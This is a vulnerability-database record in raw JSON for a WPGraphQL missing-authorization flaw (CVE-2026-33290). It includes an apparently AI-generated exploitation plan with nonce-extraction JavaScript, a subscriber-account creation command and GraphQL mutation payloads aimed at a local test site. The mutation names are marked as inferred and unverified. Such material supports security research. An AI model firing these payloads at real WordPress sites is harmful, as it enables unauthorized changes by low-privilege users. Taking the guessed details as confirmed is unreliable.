[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f14wazbjXeKgBmKV6DEge6K5qLz20g2xHrZPMpozXdMc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":26,"research_started_at":27,"research_completed_at":28,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":29},"CVE-2026-33290","wpgraphql-missing-authorization","WPGraphQL \u003C= 2.9.1 - Missing Authorization","The WPGraphQL plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.9.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","wp-graphql",null,"\u003C=2.9.1","2.10","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-24 00:00:00","2026-04-09 16:33:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2677128e-6da2-4c5e-a8ee-17c290d72c8a?source=api-prod",17,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-33290 (WPGraphQL Missing Authorization)\n\n## 1. 
Vulnerability Summary\nThe **WPGraphQL** plugin for WordPress (versions \u003C= 2.9.1) contains a missing authorization vulnerability in its administrative mutation handling. While the plugin implements a comprehensive GraphQL API, certain mutations responsible for modifying plugin configuration or performing administrative actions fail to verify the user's capabilities. This allows any authenticated user with **Subscriber-level** permissions or higher to execute these mutations, potentially altering plugin settings, clearing caches, or reconfiguring the GraphQL endpoint.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The standard WPGraphQL endpoint, typically `\u002Findex.php?graphql` or `\u002Fgraphql`.\n*   **HTTP Method:** `POST`\n*   **Authentication:** Authenticated (Subscriber-level or higher).\n*   **Payload Type:** JSON-encoded GraphQL mutation.\n*   **Vulnerable Action:** Administrative mutations, specifically `updateWpGraphQLSettings` (inferred) or `clearCache` (inferred).\n*   **Preconditions:** The plugin must be active, and \"Public Introspection\" should ideally be enabled (though not strictly required if the mutation name is known).\n\n## 3. Code Flow\n1.  **Entry Point:** A `POST` request is sent to the GraphQL endpoint.\n2.  **Request Handling:** WPGraphQL's `Router` (typically in `src\u002FRouter.php`) processes the request and hands it to the `GraphQL::execute()` method.\n3.  **Schema Processing:** The engine parses the mutation and identifies the registered mutation field.\n4.  **Vulnerable Sink:** The mutation's `mutateAndGetPayload` callback is invoked. In affected versions, this callback (likely located in `src\u002FMutation\u002FUpdateWpGraphQLSettings.php` or registered via `register_graphql_mutation` in `src\u002FType\u002FSetting\u002FWPGraphQLSettingsType.php`) fails to call `current_user_can( 'manage_options' )` before proceeding to update the WordPress options table.\n5.  
**Execution:** The `update_option()` function is called with user-supplied values from the GraphQL `input` argument.\n\n## 4. Nonce Acquisition Strategy\nWhile WPGraphQL often relies on session cookies for authenticated requests, it may require a REST API nonce (`wp_rest`) if the request is routed through the REST API or if specific security headers are enforced.\n\n**Strategy:**\n1.  Create a Subscriber user and log in.\n2.  Access the WordPress dashboard (`\u002Fwp-admin\u002Fprofile.php`).\n3.  Extract the `wp-graphql` specific settings or the standard REST nonce.\n4.  **Actionable Steps for Agent:**\n    *   Navigate to `\u002Fwp-admin\u002Findex.php`.\n    *   Use `browser_eval` to extract the nonce if the plugin localizes it.\n    *   Check for `window.wpApiSettings?.nonce` or `window.WPGraphQLSettings?.nonce`.\n    *   If no specific nonce is found, use the `wp_rest` nonce which is standard for authenticated API interactions in WP.\n\n```javascript\n\u002F\u002F Example extraction via browser_eval\nconst nonce = window.wpApiSettings?.nonce || document.querySelector('input[name=\"_wpnonce\"]')?.value;\nreturn nonce;\n```\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate unauthorized configuration changes by an authenticated Subscriber.\n\n1.  **Authenticate:** Log in as a Subscriber.\n2.  **Construct Payload:** Use the `updateWpGraphQLSettings` mutation to change a non-destructive but verifiable setting, such as the `graphql_endpoint`.\n3.  **Send Request:** Use the `http_request` tool.\n\n**Payload Request:**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Findex.php?graphql`\n*   **Method:** `POST`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: [EXTRACTED_NONCE]` (if required)\n*   **Body:**\n```json\n{\n  \"query\": \"mutation Exploit($input: UpdateWpGraphQLSettingsInput!) 
{ updateWpGraphQLSettings(input: $input) { graphql_endpoint } }\",\n  \"variables\": {\n    \"input\": {\n      \"graphql_endpoint\": \"exploited-endpoint\"\n    }\n  }\n}\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `wp-graphql` version 2.9.1 is installed and active.\n2.  **Create User:**\n    *   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3.  **Verify Initial State:**\n    *   `wp option get graphql_general_settings` (Note the current `graphql_endpoint` value, default is usually `graphql`).\n\n## 7. Expected Results\n*   **Successful Response:** The HTTP 200 response will contain a JSON object indicating the setting was updated:\n    ```json\n    {\n      \"data\": {\n        \"updateWpGraphQLSettings\": {\n          \"graphql_endpoint\": \"exploited-endpoint\"\n        }\n      }\n    }\n    ```\n*   **Unauthorized Attempt (Fixed):** A 200 OK but with an `errors` array in the JSON body stating \"Internal server error\" or \"Forbidden\" due to failed capability checks.\n\n## 8. Verification Steps\nAfter the exploit attempt, verify the change via WP-CLI to confirm the database was updated:\n\n```bash\n# Check if the setting in the database has changed\nwp option get graphql_general_settings --format=json\n```\nLook for the `graphql_endpoint` key. If it matches `\"exploited-endpoint\"`, the unauthorized mutation succeeded.\n\n## 9. Alternative Approaches\nIf `updateWpGraphQLSettings` is not available or has internal guards, attempt the `clearCache` mutation (common in GraphQL plugins) or `updateGraphiQLSettings`.\n\n**Alternative Mutation (Clear Cache):**\n```json\n{\n  \"query\": \"mutation { clearCache(input: { clientMutationId: \\\"exploit\\\" }) { status } }\"\n}\n```\nIf this returns a success status for a Subscriber, the vulnerability is confirmed. 
\n\nIf the site uses a different GraphQL endpoint path (e.g., `\u002Fgraphql` instead of `\u002Findex.php?graphql`), check the plugin settings via `wp option get graphql_general_settings` to find the correct entry point.","gemini-3-flash-preview","2026-04-17 23:04:48","2026-04-17 23:05:09",{"type":30,"vulnerable_version":31,"fixed_version":9,"vulnerable_browse":32,"vulnerable_zip":33,"fixed_browse":9,"fixed_zip":9,"all_tags":34},"plugin","2.9.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-graphql\u002Ftags\u002F2.9.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-graphql.2.9.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-graphql\u002Ftags"]